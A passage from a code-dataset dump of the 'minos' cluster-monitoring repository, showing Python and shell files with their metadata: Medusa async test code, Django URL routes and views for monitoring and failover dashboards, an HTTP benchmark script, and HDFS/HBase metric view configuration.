(self):\n return 1\n\n def handle_read (self):\n data = self.recv (self.buffer_size)\n self.parent.push (data)\n\n def handle_close (self):\n # Depending on your intentions, you may want to close\n # the parent channel here.\n self.close()\n\n# Yeah, it's bad when the test code is bigger than the library code.\n\nif __name__ == '__main__':\n\n import time\n\n def thread_function (output_file, i, n):\n print 'entering thread_function'\n while n:\n time.sleep (5)\n output_file.write ('%2d.%2d %s\\r\\n' % (i, n, output_file))\n output_file.flush()\n n = n - 1\n output_file.close()\n print 'exiting thread_function'\n\n class thread_parent (asynchat.async_chat):\n\n def __init__ (self, conn, addr):\n self.addr = addr\n asynchat.async_chat.__init__ (self, conn)\n self.set_terminator ('\\r\\n')\n self.buffer = ''\n self.count = 0\n\n def collect_incoming_data (self, data):\n self.buffer = self.buffer + data\n\n def found_terminator (self):\n data, self.buffer = self.buffer, ''\n n = string.atoi (string.split (data)[0])\n tc = thread_channel (self, thread_function, self.count, n)\n self.count = self.count + 1\n tc.start()\n\n class thread_server (asyncore.dispatcher):\n\n def __init__ (self, family=socket.AF_INET, address=('127.0.0.1', 9003)):\n asyncore.dispatcher.__init__ (self)\n self.create_socket (family, socket.SOCK_STREAM)\n self.set_reuse_addr()\n self.bind (address)\n self.listen (5)\n\n def handle_accept (self):\n conn, addr = self.accept()\n tp = thread_parent (conn, addr)\n\n thread_server()\n #asyncore.loop(1.0, use_poll=1)\n asyncore.loop ()\n"
},
{
"alpha_fraction": 0.6969696879386902,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 32,
"blob_id": "3129fdcb973e3f4ac36dcfd286e910a8690b7039",
"content_id": "b3ab0e7879fd8fe15c0455aa41cbceb6df5bb15f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 66,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 2,
"path": "/opentsdb/collector.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n$ENV_PYTHON metrics_collector.py > collector.log 2>&1\n"
},
{
"alpha_fraction": 0.6437153220176697,
"alphanum_fraction": 0.6441774368286133,
"avg_line_length": 49.32558059692383,
"blob_id": "af05866c5d563dc29e6e30fc0778c924c32d3672",
"content_id": "15115d93f26eb9a6f49d58a41943e3774bca53df",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2164,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 43,
"path": "/owl/monitor/urls.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url\nimport views\n\nurlpatterns = patterns(\n '',\n url(r'^$', views.index),\n\n url(r'^metrics/', views.show_all_metrics),\n url(r'^metrics_config/', views.show_all_metrics_config),\n\n url(r'^counters/', views.show_all_counters),\n url(r'^addCounter/$', views.add_counter),\n\n url(r'^service/(?P<id>\\d+)/$', views.show_service),\n url(r'^cluster/(?P<id>\\d+)/$', views.show_cluster),\n url(r'^cluster/(?P<id>\\d+)/task/$', views.show_cluster_task_board),\n url(r'^cluster/(?P<id>\\d+)/user/$', views.show_cluster_user_board),\n url(r'^cluster/(?P<id>\\d+)/total/$', views.show_quota_total_board),\n url(r'^cluster/(?P<id>\\d+)/basic/$', views.show_cluster_basic_board),\n url(r'^cluster/(?P<id>\\d+)/table/$', views.show_cluster_table_board),\n url(r'^cluster/(?P<id>\\d+)/regionserver/$', views.show_cluster_regionserver_board),\n url(r'^cluster/(?P<id>\\d+)/replication/$', views.show_cluster_replication),\n url(r'^cluster/(?P<id>\\d+)/builtin_metrics/$', views.show_cluster_storm_builtin_metrics),\n url(r'^cluster/(?P<id>\\d+)/system_metrics/$', views.show_cluster_storm_system_metrics),\n url(r'^cluster/(?P<id>\\d+)/user_metrics/$', views.show_cluster_storm_user_metrics),\n url(r'^cluster/(?P<id>\\d+)/topology/$', views.show_storm_topology),\n\n url(r'^job/(?P<id>[^/]+)/$', views.show_job),\n url(r'^task/(?P<id>[^/]+)/$', views.show_task),\n\n url(r'^table/$', views.show_all_tables),\n url(r'^table/(?P<id>\\d+)/$', views.show_table),\n url(r'^table/operation/(?P<id>\\d+)/$', views.show_table_operation),\n url(r'^table/count_rows/$', views.show_table_count_rows),\n url(r'^table/add_count_rows/(?P<id>\\d+)/$', views.add_table_count_rows),\n url(r'^table/cancel_count_rows/(?P<id>\\d+)/$', views.cancel_table_count_rows),\n url(r'^cluster/operation/(?P<id>\\d+)/$', views.show_cluster_operation),\n url(r'^cluster/operation/tablecomparsion/(?P<id>\\d+)/$', views.show_cluster_operation_table_comparison),\n url(r'^regionserver/(?P<id>\\d+)/$', views.show_regionserver),\n url(r'^user/(?P<id>\\d+)/$', views.show_user_quota),\n url(r'^regionserver/operation/(?P<id>\\d+)/$', views.show_regionserver_operation),\n)\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 20,
"blob_id": "8bc3f08d3a002c70f29f81cb31c49320f172c560",
"content_id": "d98d786d7151373373d72b4040ecc6f717fc5f63",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 1,
"path": "/supervisor/superlance/__init__.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# superlance package\n"
},
{
"alpha_fraction": 0.5525209903717041,
"alphanum_fraction": 0.575630247592926,
"avg_line_length": 26.200000762939453,
"blob_id": "ef5c2937aa82f6eb6aac3220c6dd49cf823558a3",
"content_id": "6fde7301161980e484ac119c18a5c6b8af25a426",
"detected_licenses": [
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor",
"HPND",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 952,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 35,
"path": "/supervisor/supervisor/medusa/test/bench.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# benchmark a single channel, pipelined\n\nrequest = 'GET /index.html HTTP/1.0\\r\\nConnection: Keep-Alive\\r\\n\\r\\n'\nlast_request = 'GET /index.html HTTP/1.0\\r\\nConnection: close\\r\\n\\r\\n'\n\nimport socket\nimport time\n\nclass timer:\n def __init__ (self):\n self.start = time.time()\n def end (self):\n return time.time() - self.start\n\ndef bench (host, port=80, n=100):\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.connect ((host, port))\n t = timer()\n s.send ((request * n) + last_request)\n while 1:\n d = s.recv(65536)\n if not d:\n break\n total = t.end()\n print 'time: %.2f seconds (%.2f hits/sec)' % (total, n/total)\n\nif __name__ == '__main__':\n import sys\n import string\n if len(sys.argv) < 3:\n print 'usage: %s <host> <port> <count>' % (sys.argv[0])\n else:\n bench (sys.argv[1], string.atoi (sys.argv[2]), string.atoi (sys.argv[3]))\n"
},
{
"alpha_fraction": 0.6267281174659729,
"alphanum_fraction": 0.6313363909721375,
"avg_line_length": 18.727272033691406,
"blob_id": "726c5a1702b4cf2d85af316f4cee854af7f1047c",
"content_id": "f4764ef85747bc21521b0dd5fe9bd3c22f0c07aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 11,
"path": "/owl/failover_framework/urls.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import patterns, url\nimport views\n\nurlpatterns = patterns(\n '',\n url(r'^$', views.index),\n url(r'^action/', views.show_actions),\n url(r'^task/', views.show_tasks),\n)\n"
},
{
"alpha_fraction": 0.6890547275543213,
"alphanum_fraction": 0.6902984976768494,
"avg_line_length": 25.799999237060547,
"blob_id": "18fa4705fda1e618652be44f2b0f21ce4e7e060e",
"content_id": "b185818a5414c8bc85d6338a769a074e7028391a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 804,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 30,
"path": "/owl/hbase/views.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom models import Longhaul\nfrom monitor.views import respond\nfrom monitor.dbutil import get_counters_by_group\n\ndef index(request):\n # show all cluster\n longhauls = Longhaul.objects.all()\n params = {\n 'longhauls': longhauls,\n }\n return respond(request, 'hbase/index.html', params)\n\n#url: /longhaul/$id/\ndef show_longhaul(request, id):\n longhaul = Longhaul.objects.get(id=id)\n group = longhaul.getCounterGroup()\n counters = get_counters_by_group(group)\n endpoint = 'unknown'\n counter_names = []\n for counter in counters:\n endpoint = counter.host\n counter_names.append(group + '-' + counter.name)\n \n params = {\n 'endpoint': endpoint,\n 'counter_names': counter_names,\n 'longhaul': longhaul,\n }\n return respond(request, 'hbase/longhaul.html', params)\n"
},
{
"alpha_fraction": 0.6901368498802185,
"alphanum_fraction": 0.7127993106842041,
"avg_line_length": 41.51515197753906,
"blob_id": "7f432e07e9f87c4389603a4488e6cc1146c75a64",
"content_id": "cf973223bab5df6d6d69309372f59cc384096f1b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7016,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 165,
"path": "/owl/failover_framework/views.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport datetime\nimport httplib\nimport time\n\nfrom django.conf import settings\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext, Context, loader\n\nfrom models import Action\nfrom models import Task\n\n# /failover/\ndef index(request):\n\n current_time = time.time() * 1000 # in ms\n now = datetime.datetime.now()\n today_first_timestamp = current_time - ((now.hour*60 + now.minute)*60 + now.second)*1000\n previous_hour = current_time - 3600000 # 60*60*1000\n previous_day = current_time - 86400000 # 24*60*60*1000\n previous_week = current_time - 604800000 # 7*24*60*60*1000\n previous_month = current_time - 2592000000 # 30*24*60*60*100\n previous_year = current_time - 31536000000 # 365*24*60*60*1000\n\n hour_task_number = Task.objects.filter(start_timestamp__gt=previous_hour).count()\n hour_fail_task_number = Task.objects.filter(start_timestamp__gt=previous_hour, success=False).count()\n hour_action_number = Action.objects.filter(task_id__gt=previous_hour).count()\n hour_fail_action_number = Action.objects.filter(task_id__gt=previous_hour, success=False).count()\n day_task_number = Task.objects.filter(start_timestamp__gt=previous_day).count()\n day_fail_task_number = Task.objects.filter(start_timestamp__gt=previous_day, success=False).count()\n day_action_number = Action.objects.filter(task_id__gt=previous_day).count()\n day_fail_action_number = Action.objects.filter(task_id__gt=previous_day, success=False).count()\n week_task_number = Task.objects.filter(start_timestamp__gt=previous_week).count()\n week_fail_task_number = Task.objects.filter(start_timestamp__gt=previous_week, success=False).count()\n week_action_number = Action.objects.filter(task_id__gt=previous_week).count()\n week_fail_action_number = Action.objects.filter(task_id__gt=previous_week, success=False).count()\n month_task_number = Task.objects.filter(start_timestamp__gt=previous_month).count()\n month_fail_task_number = Task.objects.filter(start_timestamp__gt=previous_month, success=False).count()\n month_action_number = Action.objects.filter(task_id__gt=previous_month).count()\n month_fail_action_number = Action.objects.filter(task_id__gt=previous_month, success=False).count()\n year_task_number = Task.objects.filter(start_timestamp__gt=previous_year).count()\n year_fail_task_number = Task.objects.filter(start_timestamp__gt=previous_year, success=False).count()\n year_action_number = Action.objects.filter(task_id__gt=previous_year).count()\n year_fail_action_number = Action.objects.filter(task_id__gt=previous_year, success=False).count()\n total_task_number = Task.objects.count()\n total_fail_task_number = Task.objects.filter(success=False).count()\n total_action_number = Action.objects.count()\n total_fail_action_number = Action.objects.filter(success=False).count()\n\n today_tasks = Task.objects.filter(start_timestamp__gt=today_first_timestamp)\n context = {\n \"chart_id\": \"today_tasks\",\n \"chart_title\": \"Today Tasks\",\n \"tasks\": today_tasks,\n }\n failover_task_chart = loader.get_template(\"failover_task_chart.tpl\").render(Context(context))\n\n host = settings.FAILOVER_FRAMEWORK_HOST\n port = settings.FAILOVER_FRAMEWORK_PORT\n host_port = host + \":\" + str(port)\n\n try:\n conn = httplib.HTTPConnection(host_port)\n conn.request('HEAD', \"/\")\n response = conn.getresponse()\n conn.close()\n is_running = response.status == 200\n except:\n is_running = False\n \n context = {\n \"failover_task_chart\": failover_task_chart,\n \"is_running\": is_running,\n \"host_port\": host_port,\n \"hour_task_number\": hour_task_number,\n \"hour_fail_task_number\": hour_fail_task_number,\n \"hour_action_number\": hour_action_number,\n \"hour_fail_action_number\": hour_fail_action_number,\n \"day_task_number\": day_task_number,\n \"day_fail_task_number\": day_fail_task_number,\n \"day_action_number\": day_action_number,\n \"day_fail_action_number\": day_fail_action_number,\n \"week_task_number\": week_task_number,\n \"week_fail_task_number\": week_fail_task_number,\n \"week_action_number\": week_action_number,\n \"week_fail_action_number\": week_fail_action_number,\n \"month_task_number\": month_task_number,\n \"month_fail_task_number\": month_fail_task_number,\n \"month_action_number\": month_action_number,\n \"month_fail_action_number\": month_fail_action_number,\n \"year_task_number\": year_task_number,\n \"year_fail_task_number\": year_fail_task_number,\n \"year_action_number\": year_action_number,\n \"year_fail_action_number\": year_fail_action_number,\n \"total_task_number\": total_task_number,\n \"total_fail_task_number\": total_fail_task_number,\n \"total_action_number\": total_action_number,\n \"total_fail_action_number\": total_fail_action_number,\n }\n return render_to_response(\"index.html\", context, context_instance=RequestContext(request))\n\ndef paging_objects(request, objects, number):\n paginator = Paginator(objects, number)\n page = request.GET.get(\"page\")\n try:\n objects_to_show = paginator.page(page)\n except PageNotAnInteger:\n objects_to_show = paginator.page(1)\n except EmptyPage:\n objects_to_show = paginator.page(page.num_pages)\n return objects_to_show\n\n# /failover/task/\ndef show_tasks(request):\n \n # ?latest=10\n if request.GET.get(\"latest\"):\n number = request.GET.get(\"latest\")\n # ?latest=10&fail=Ture\n if request.GET.get(\"fail\"):\n tasks = Task.objects.filter(success=False).order_by(\"start_timestamp\").reverse()[:number]\n else:\n tasks = Task.objects.all().order_by(\"start_timestamp\").reverse()[:number]\n # ?start_time=2013-09-11%2017:51:22\n elif request.GET.get(\"start_time\"):\n tasks = Task.objects.filter(start_time=request.GET.get(\"start_time\"))\n # no params\n else:\n tasks = Task.objects.all().order_by(\"start_timestamp\").reverse() \n\n tasks_to_show = paging_objects(request, tasks, 20)\n\n context = {\n \"tasks\": tasks_to_show,\n }\n return render_to_response(\"show_tasks.html\", context, context_instance=RequestContext(request))\n\n\n# /failover/action/\ndef show_actions(request):\n \n # ?latest=10\n if request.GET.get(\"latest\"):\n number = request.GET.get(\"latest\")\n # ?latest=10&fail=True\n if request.GET.get(\"fail\"):\n actions = Action.objects.filter(success=False).order_by(\"task\").reverse()[:number]\n else:\n actions = Action.objects.all().order_by(\"task\").reverse()[:number]\n # ?start_time=2013-09-11_%2017:51:22\n elif request.GET.get(\"start_time\"):\n actions = Action.objects.filter(start_time=request.GET.get(\"start_time\"))\n else:\n actions = Action.objects.all().order_by(\"task\").reverse()\n \n actions_to_show = paging_objects(request, actions, 20)\n\n context = {\n \"actions\": actions_to_show,\n }\n return render_to_response(\"show_actions.html\", context, context_instance=RequestContext(request))\n\n"
},
{
"alpha_fraction": 0.5558063387870789,
"alphanum_fraction": 0.5794589519500732,
"avg_line_length": 52.253204345703125,
"blob_id": "073a596c8de73abea7d0ca3b397e1693bf21a703",
"content_id": "b388b9ec40d42d5ff3248fdacc1e7e95ad06b134",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33231,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 624,
"path": "/owl/monitor/metric_view_config.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "\nTASK_METRICS_VIEW_CONFIG = {\n 'hdfs': {\n 'journalnode':[\n ('Rpc', [\n [('JournalNode', 'ReceivedBytes', 'byte(s)')],\n [('JournalNode', 'SentBytes', 'byte(s)')],\n [('JournalNode', 'RpcQueueTimeNumOps', 'op(s)')],\n [('JournalNode', 'RpcQueueTimeAvgTime', 'ms(s)')],\n ]),\n ],\n 'namenode':[\n # view\n ('Overall', [\n # graph\n # TODO:support comparison multi-metric in one graph\n [('NameNode', 'BlockCapacity', 'block(s)')],\n [('NameNode', 'BlocksTotal', 'block(s)')],\n [('NameNode', 'CapacityRemainingGB', 'GB')],\n [('NameNode', 'CapacityTotalGB', 'GB')],\n [('NameNode', 'CapacityUsedGB', 'GB')],\n [('NameNode', 'CorruptBlocks', 'block(s)')],\n [('NameNode', 'ExcessBlocks', 'block(s)')],\n [('NameNode', 'FilesTotal', 'file(s)')],\n ]),\n ('Operation', [\n [('NameNode', 'AddBlockOps', 'op(s)')],\n [('NameNode', 'CreateFileOps', 'op(s)')],\n [('NameNode', 'DeleteFileOps', 'op(s)')],\n [('NameNode', 'FileInfoOps', 'op(s)')],\n [('NameNode', 'GetListingOps', 'op(s)')],\n ]),\n ('Rpc', [\n [('NameNode', 'ReceivedBytes', 'byte(s)')],\n [('NameNode', 'SentBytes', 'byte(s)')],\n [('NameNode', 'RpcQueueTimeNumOps', 'op(s)')],\n [('NameNode', 'RpcQueueTimeAvgTime', 'ms(s)')],\n ]\n )\n ],\n 'datanode':[\n ('BlockOperation', [\n [('DataNode', 'BlockReportsAvgTime', 'ms(s)')],\n [('DataNode', 'BlockReportsNumOps', 'op(s)')],\n [('DataNode', 'BlocksGetLocalPathInfo', '')],\n [('DataNode', 'BlocksRead', 'block(s)')],\n [('DataNode', 'BlocksRemoved', 'block(s)')],\n [('DataNode', 'BlocksReplicated', 'block(s)')],\n [('DataNode', 'BlocksVerified', 'block(s)')],\n [('DataNode', 'BlocksWritten', 'block(s)')],\n ]),\n ('Activity', [\n [('DataNode', 'BytesWritten', '')],\n [('DataNode', 'BytesRead', '')],\n [('DataNode', 'BlocksWritten', '')],\n [('DataNode', 'BlocksRead', '')],\n [('DataNode', 'BlocksReplicated', '')],\n [('DataNode', 'BlocksRemoved', '')],\n [('DataNode', 'BlocksVerified', '')],\n [('DataNode', 'BlockVerificationFailures', '')],\n [('DataNode', 'ReadsFromLocalClient', '')],\n [('DataNode', 'ReadsFromRemoteClient', '')],\n [('DataNode', 'WritesFromLocalClient', '')],\n [('DataNode', 'WritesFromRemoteClient', '')],\n [('DataNode', 'BlocksGetLocalPathInfo', '')],\n [('DataNode', 'FsyncCount', '')],\n [('DataNode', 'VolumeFailures', '')],\n [('DataNode', 'ReadBlockOpNumOps', '')],\n [('DataNode', 'ReadBlockOpAvgTime', '')],\n [('DataNode', 'WriteBlockOpNumOps', '')],\n [('DataNode', 'WriteBlockOpAvgTime', '')],\n [('DataNode', 'BlockChecksumOpNumOps', '')],\n [('DataNode', 'BlockChecksumOpAvgTime', '')],\n [('DataNode', 'CopyBlockOpNumOps', '')],\n [('DataNode', 'CopyBlockOpAvgTime', '')],\n [('DataNode', 'ReplaceBlockOpNumOps', '')],\n [('DataNode', 'ReplaceBlockOpAvgTime', '')],\n [('DataNode', 'HeartbeatsNumOps', '')],\n [('DataNode', 'HeartbeatsAvgTime', '')],\n [('DataNode', 'BlockReportsNumOps', '')],\n [('DataNode', 'BlockReportsAvgTime', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanosNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanosAvgTime', '')],\n [('DataNode', 'FlushNanosNumOps', '')],\n [('DataNode', 'FlushNanosAvgTime', '')],\n [('DataNode', 'FsyncNanosNumOps', '')],\n [('DataNode', 'FsyncNanosAvgTime', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanosNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanosAvgTime', '')],\n [('DataNode', 'SendDataPacketTransferNanosNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanosAvgTime', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60sNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s50thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s75thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s90thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s95thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos60s99thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300sNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s50thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s75thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s90thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s95thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos300s99thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900sNumOps', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s50thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s75thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s90thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s95thPercentileLatency', '')],\n [('DataNode', 'PacketAckRoundTripTimeNanos900s99thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60sNumOps', '')],\n [('DataNode', 'FlushNanos60s50thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s75thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s90thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s95thPercentileLatency', '')],\n [('DataNode', 'FlushNanos60s99thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300sNumOps', '')],\n [('DataNode', 'FlushNanos300s50thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s75thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s90thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s95thPercentileLatency', '')],\n [('DataNode', 'FlushNanos300s99thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900sNumOps', '')],\n [('DataNode', 'FlushNanos900s50thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s75thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s90thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s95thPercentileLatency', '')],\n [('DataNode', 'FlushNanos900s99thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60sNumOps', '')],\n [('DataNode', 'FsyncNanos60s50thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s75thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s90thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s95thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos60s99thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300sNumOps', '')],\n [('DataNode', 'FsyncNanos300s50thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s75thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s90thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s95thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos300s99thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900sNumOps', '')],\n [('DataNode', 'FsyncNanos900s50thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s75thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s90thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s95thPercentileLatency', '')],\n [('DataNode', 'FsyncNanos900s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60sNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos60s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300sNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos300s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900sNumOps', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketBlockedOnNetworkNanos900s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60sNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos60s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300sNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos300s99thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900sNumOps', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s50thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s75thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s90thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s95thPercentileLatency', '')],\n [('DataNode', 'SendDataPacketTransferNanos900s99thPercentileLatency', '')],\n ]),\n ],\n },\n 'hbase' : {\n 'master':[\n ('Operation', [\n [('HBase', 'putNumOps', 'op(s)')],\n [('HBase', 'putAvgTime', 'us(s)')],\n [('HBase', 'checkAndPutNumOps', 'op(s)')],\n [('HBase', 'checkAndPutAvgTime', 'us(s)')],\n [('HBase', 'getNumOps', 'op(s)')],\n [('HBase', 'getAvgTime', 'us(s)')],\n [('HBase', 'deleteNumOps', 'op(s)')],\n [('HBase', 'deleteAvgTime', 'us(s)')],\n ]),\n ('RPC', [\n [('HBase', 'RpcQueueTimeNumOps', 'op(s)')],\n [('HBase', 'RpcQueueTimeAvgTime', 'ms(s)')],\n [('HBase', 'RpcProcessingTimeNumOps', 'op(s)')],\n [('HBase', 'RpcProcessingTimeAvgTime', 'us(s)')],\n [('HBase', 'RpcSlowResponseNumOps', 'op(s)')],\n [('HBase', 'RpcSlowResponseAvgTime', 'ms(s)')],\n ]),\n ('JvmStatistics', [\n [('Master', 'memHeapCommittedM', 'MB')],\n [('Master', 'fatalCount', 'count(s)')],\n [('Master', 'threadsWaiting', 'thread(s)')],\n [('Master', 'threadsBlocked', 'thread(s)')],\n [('Master', 'gcCount', 'count(s)')],\n [('Master', 'errorCount', 'count(s)')],\n [('Master', 'memNonHeapCommittedM', 'MB')],\n [('Master', 'warnCount', 'count(s)')],\n [('Master', 'gcTimeMillis', 'ms(s)')],\n [('Master', 'memNonHeapUsedM', 'MB')],\n [('Master', 'memHeapUsedM', 'MB')],\n [('Master', 'threadsNew', 'thread(s)')],\n [('Master', 'threadsTerminated', 'thread(s)')],\n [('Master', 'threadsTimedWaiting', 'thread(s)')],\n [('Master', 'maxMemoryM', 'MB')],\n [('Master', 'infoCount', 'count(s)')],\n [('Master', 'threadsRunnable', 'thread(s)')],\n ]),\n ],\n 'regionserver': [\n ('Operation', [\n [('HBase', 'multiNumOps', 'op(s)')],\n [('HBase', 'multiAvgTime', 'us(s)')],\n [('HBase', 'checkAndPutNumOps', 'op(s)')],\n [('HBase', 'checkAndPutAvgTime', 'us(s)')],\n [('HBase', 'getNumOps', 'op(s)')],\n [('HBase', 'getAvgTime', 'us(s)')],\n [('HBase', 'openScannerNumOps', 'op(s)')],\n [('HBase', 'openScannerAvgTime', 'us(s)')],\n [('HBase', 'nextNumOps', 'op(s)')],\n [('HBase', 'nextAvgTime', 'us(s)')],\n [('HBase', 'deleteNumOps', 'op(s)')],\n [('HBase', 'deleteAvgTime', 'us(s)')],\n ]),\n ('RPC', [\n [('HBase', 'RpcQueueTimeNumOps', 'op(s)')],\n [('HBase', 'RpcQueueTimeAvgTime', 'ms(s)')],\n [('HBase', 